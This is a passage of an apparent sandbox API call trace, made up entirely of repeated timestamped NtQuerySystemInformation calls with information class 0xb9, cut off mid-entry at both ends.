ResultLength=0x0) [0288.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0288.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0288.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0288.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0288.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0288.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0288.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0288.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0288.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0288.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0288.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0288.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0288.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0288.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x28, ResultLength=0x0) [0288.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x28, ResultLength=0x0) [0288.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0288.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x20, ResultLength=0x0) [0288.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x20, ResultLength=0x0) [0288.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x20, ResultLength=0x0) [0288.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0288.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0288.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff8, Length=0x50, ResultLength=0x0) [0288.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0288.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0288.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0288.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0288.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0288.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x28, ResultLength=0x0) [0288.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0288.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0288.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0288.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0288.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0288.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0288.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0288.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0288.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0288.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0288.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0288.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0288.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.885] NtQuerySystemInformation 